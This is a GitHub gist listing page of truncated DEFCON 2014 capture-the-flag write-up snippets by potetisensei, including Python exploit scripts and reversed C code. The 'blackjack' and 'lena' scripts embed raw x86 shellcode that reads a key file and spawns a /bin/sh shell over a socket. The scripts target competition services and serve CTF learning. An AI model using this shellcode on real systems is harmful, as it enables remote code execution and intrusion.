Skip to content

Instantly share code, notes, and snippets.

View potetisensei's full-sized avatar

potetisensei

41 followers · 20 following
View GitHub Profile
@potetisensei
potetisensei / gist:8866000
Created February 7, 2014 16:16
#-*- encoding:utf-8 -*-
from base64 import b64encode, b64decode
from pickle import dumps, loads
from struct import pack, unpack
NONE = -1
WHITE = 1
RED = 2
BLUE = 3
@potetisensei
potetisensei / solve.py
Created February 15, 2014 14:03
DEFCON Writeup blackjack
from socket import *
shellcode = '\xeb)j\x05X[1\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xef\x89\xf91\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2j\x04X\x8a\\$\x04\xcd\x80j\x01XC\xcd\x80\xe8\xd2\xff\xff\xffkey'
codes = '85\nH\nS\n95\nS\n125\nH\n17\nS\n109\nS\n125\nH\nH\nH\n57\nH\nH\n1\nH\nS\n1\nH\nH\nH\n25\nH\n-1'
t = socket(AF_INET, SOCK_STREAM)
t.connect(("192.168.174.187", 6789))
print t.recv(2048)
t.sendall("0\x00\x00\x00" + shellcode + "\n")
@potetisensei
potetisensei / solve.py
Created February 16, 2014 07:52
DEFCON Writeup annyong
import sys
sys.path.append("/home/poteti/pwntools/")
from pwn import process
from struct import pack, unpack
def read_addr_packed(packed_addr):
return unpack("<Q", packed_addr + "\x00" * (8 - len(packed_addr)))[0]
@potetisensei
potetisensei / sis.c
Created February 16, 2014 12:06
DEFCON Writeup incest
int main(int argc, char *argv[]) {
int p;
int netfd;
int filefd;
signal(SIGALRM, quitter);
alarm(0x0F);
netfd = atoi(argv[2]);
filefd = atoi(argv[1]);
@potetisensei
potetisensei / penser.c
Last active August 29, 2015 13:56
DEFCON Writeup penser
int recv_fd(int fd, void *buf, int size) {
if (buf == NULL) return -1;
else if (size == 0) return 0;
return recv(fd, buf, size, 0);
}
int send_fd(int fd, void *buf, int size) {
int i = 0;
@potetisensei
potetisensei / junk.c
Created March 28, 2014 04:16
JUNK
class ECCDecodeDataStream {
public:
uint var_4[0x20];
uint var_84;
uint var_88;
uint *var_8C;
uint var_90;
uint var_94;
uint var_98;
uint var_9C;
@potetisensei
potetisensei / solve.py
Created March 28, 2014 05:08
DEFCON Writeup lena
from PIL import Image
from socket import *
from random import randint
from reedsolo import RSCodec
from struct import pack
shellcode = list("jfX\x99j\x01[RSj\x02\x89\xe1\xeb\x01\x90\xcd\x80[]\xbe\x80\xff\xff\xfe\xf7\xd6V\x90\xeb\x01\x90f\xbdiz\x0f\xcd\t\xddUCj\x10Q\xeb\x01\x90P\xb0f\x89\xe1\xcd\x80\x87\xd9[\xb0?\x90\xeb\x01\x90\xcd\x80Iy\xf5\xb0\x0bR\x90\x90\x90\x90\x90\xeb\x01\x90h//shh/bin\x89\xe3R\xeb\x01\x90S\xeb\xd0")
rs = RSCodec(17)
encoded_shellcode = ""
@potetisensei
potetisensei / heap.c
Created May 19, 2014 12:40
Written by @nk0t
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
int lastrand;
void (*exit_func)();
void do_exit(int arg_0)
{
@potetisensei
potetisensei / solve.py
Created May 19, 2014 13:16
DEFCON 2014 Writeup heap
from struct import pack
from socket import *
from pwn import process
chunk_data_list = [0x00000379,0x000004e8,0x00000421,0x00000489,0x00000421,0x00000429,0x00000391,0x00000379,0x00000341]
p = socket(AF_INET, SOCK_STREAM)
p.connect(("babyfirst-heap_33ecf0ad56efc1b322088f95dd98827c.2014.shallweplayaga.me", 4088))
#p = process("./heap")
@potetisensei
potetisensei / memo.c
Created May 19, 2014 13:28
shitsco incomplete
int global_permission; /* global_permission */
int sub_8048C30(int fd, char *buf, int size, char splitter) {
char tmp_buf[]; /* var_1D */
unsigned int ind = 0; /* register ebx */
if (size <= 0) return ind;
while (1) {
if (read(fd, tmp_buf, 1) <= 0) return -1;